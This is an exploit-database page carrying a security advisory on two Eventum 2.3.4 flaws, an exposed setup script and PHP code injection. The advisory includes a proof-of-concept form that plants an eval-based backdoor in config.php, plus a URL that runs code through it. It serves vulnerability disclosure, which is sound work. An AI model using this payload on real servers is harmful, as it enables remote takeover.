Menu

Search for hundreds of thousands of exploits

"Eventum 2.3.4 - 'hostname' Remote Code Execution"

Author

Exploit author

"High-Tech Bridge"

Platform

Exploit platform

php

Release date

Exploit published date

2014-01-28

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
Advisory ID: HTB23198
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Advisory Publication:  January 22, 2014  [without technical details]
Vendor Notification: January 22, 2014 
Vendor Patch: January 24, 2014 
Public Disclosure: January 27, 2014 
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
CVE References: CVE-2014-1631, CVE-2014-1632
Risk Level: Critical 
CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can be exploited to reinstall and compromise vulnerable application.


1) Incorrect Default Permissions in Eventum: CVE-2014-1631

The vulnerability exists due to incorrect default permission set for installation scripts. Access to installation script located at "/setup/index.php" is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall vulnerable application. 

The installation script can be access by a remote unauthenticated user via the following URL:

http://[host]/setup/index.php


2) Code Injection in Eventum: CVE-2014-1632

The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" in "/config/config.php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with privileges of the webserver. Successful exploitation requires access to applications database, which can be achieved by providing address of attacker-controlled MySQL server. 

The following exploitation example injects a backdoor into "/config/config.php" file:


<form action="http://[host]/setup/index.php" method="post" name="main">
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="db_hostname">
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_table_prefix" value="db_table_prefix">
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="db_username">
<input type="hidden" name="setup[smtp][from]" value="email@email.com">
<input type="hidden" name="setup[smtp][host]" value="localhost">
<input type="hidden" name="setup[smtp][port]" value="25">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>


After successful reinstallation an attacker can execute arbitrary PHP code on the system. The following example executes the "phpinfo()" PHP function on the vulnerable system:

http://[host]/index.php?cmd=phpinfo%28%29;

-----------------------------------------------------------------------------------------------

Solution:

Update to Eventum 2.3.5

More Information:
https://bugs.launchpad.net/eventum/+bug/1271499

Vendor disclosed vulnerabilities and authorized us to release advisory on public before our usual delay (3 weeks).

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23198 - https://www.htbridge.com/advisory/HTB23198 - Multiple Vulnerabilities in Eventum.
[2] Eventum - https://launchpad.net/eventum - Eventum is a user-friendly and flexible issue tracking system that can be used by a support department to track incoming technical support requests, or by a software development team to quickly organize tasks and bugs.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Release Date Title Type Platform Author
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
Release Date Title Type Platform Author
2014-08-20 "ArticleFR - 'id' SQL Injection" webapps php "High-Tech Bridge"
2014-07-23 "Ilya Birman E2 - '/@actions/comment-process' SQL Injection" webapps php "High-Tech Bridge"
2014-05-08 "TOA - Cross-Site Request Forgery" webapps php "High-Tech Bridge"
2014-03-24 "Symphony 2.2.4 - Cross-Site Request Forgery" webapps php "High-Tech Bridge"
2014-01-28 "Eventum 2.3.4 - 'hostname' Remote Code Execution" webapps php "High-Tech Bridge"
2014-01-27 "Eventum - Insecure File Permissions" webapps php "High-Tech Bridge"
2014-01-16 "Joomla! Component Sexy polling 1.0.8 - 'answer_id' SQL Injection" webapps php "High-Tech Bridge"
2013-12-11 "eduTrac - 'showmask' Directory Traversal" webapps php "High-Tech Bridge"
2013-08-21 "Twilight CMS - DeWeS Web Server Directory Traversal" webapps php "High-Tech Bridge"
2013-07-31 "Jahia xCM - '/administration/' Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2013-07-31 "Jahia xCM - '/engines/manager.jsp?site' Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-07-24 "Magnolia CMS - Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2013-07-24 "WordPress Plugin Duplicator - Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-06-26 "Xaraya - Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2013-04-10 "Hero Framework - '/users/login?Username' Cross-Site Scripting" webapps java "High-Tech Bridge"
2013-04-10 "Hero Framework - '/users/forgot_password?error' Cross-Site Scripting" webapps java "High-Tech Bridge"
2013-04-03 "Symphony - 'sort' SQL Injection" webapps php "High-Tech Bridge"
2013-04-03 "FUDforum - Multiple Remote PHP Code Injection Vulnerabilities" webapps php "High-Tech Bridge"
2013-02-27 "Geeklog - Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-02-06 "WordPress Plugin Wysija Newsletters - Multiple SQL Injections" webapps php "High-Tech Bridge"
2013-02-06 "WordPress Plugin CommentLuv - '_ajax_nonce' Cross-Site Scripting" webapps php "High-Tech Bridge"
2013-01-31 "Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities" remote multiple "High-Tech Bridge"
2013-01-09 "Samsung Kies - Remote Buffer Overflow" remote windows "High-Tech Bridge"
2013-01-09 "Quick.CMS / Quick.Cart - Cross-Site Scripting" webapps php "High-Tech Bridge"
2012-12-10 "Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities" webapps cgi "High-Tech Bridge"
2012-11-21 "dotProject 2.1.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities" webapps php "High-Tech Bridge"
2012-11-21 "dotProject 2.1.x - 'index.php' Multiple SQL Injections" webapps php "High-Tech Bridge"
2012-11-07 "OrangeHRM - 'sortField' SQL Injection" webapps php "High-Tech Bridge"
2012-10-17 "jCore - '/admin/index.php?path' Cross-Site Scripting" webapps php "High-Tech Bridge"
2012-10-10 "OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting" webapps php "High-Tech Bridge"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.